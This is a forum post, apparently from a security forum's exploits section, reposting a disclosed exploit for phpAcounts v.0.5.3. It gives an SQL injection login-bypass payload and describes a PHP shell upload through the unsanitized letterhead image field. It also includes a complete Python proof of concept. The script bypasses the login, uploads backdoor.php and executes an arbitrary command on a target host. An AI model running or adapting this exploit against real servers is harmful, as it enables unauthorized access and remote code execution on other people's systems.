Jump to content
The_Arhitect

phpAcounts v.0.5.3 SQL Injection

By The_Arhitect, in Exploituri

Recommended Posts

The_Arhitect Newbie

The_Arhitect

Posted
Posted

phpAcounts v.0.5.3 SQL Injection

######################################################################################
# Exploit phpAcounts v.0.5.3 SQL Injection
# Date: June 6nd 2012
# Author: loneferret
# Version: 0.5.3
# Vendor Url: http://phpaccounts.com/
# Tested on: Ubuntu Server 11.10
######################################################################################
# Discovered by: loneferret
######################################################################################

# Old app, still fun.

Auth. Bypass:
http://<server>/phpaccounts/index.php
Username: x' or '1'='1'#
Password: <whatever>

Upload php shell in preferences 
Letterhead image upload does not sanitize file extensions.
http://server/index.php?page=tasks&action=preferences

Acess shell:
Where '1' is the user's ID.
http://server/phpaccounts/users/1/<filename>



---- Python PoC ---------

#!/usr/bin/python

import re, mechanize
import urllib, sys

print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]


print "[*] Bypassing Login ."
try:
        br = mechanize.Browser()
        br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
        assert br.viewing_html()
        br.select_form(name="loginForm")
        br.select_form(nr=0)
        br.form['Login_Username'] = "x' or '1'#"
        br.form['Login_Password'] = "pwnd"
        print "[*] Triggering SQLi .."
        br.submit()
except:
        print "[*] Oups..Something happened"
        exit(0)

print "[*] Uploading Shell ..."
try:
        br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
        assert br.viewing_html()
        br.select_form(nr=0)
        br.form["Preferences[LETTER_HEADER]"] = 'test'
        br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
        br.submit(nr=2)
except:
        print "[*] Upload didn't work"
        exit(0)

print "[*] Command Executed\n"
try:
        shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
        print shell.read()
except:
        print "[*] Oups."
        exit(0)

Sursa: phpAcounts v.0.5.3 SQL Injection

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...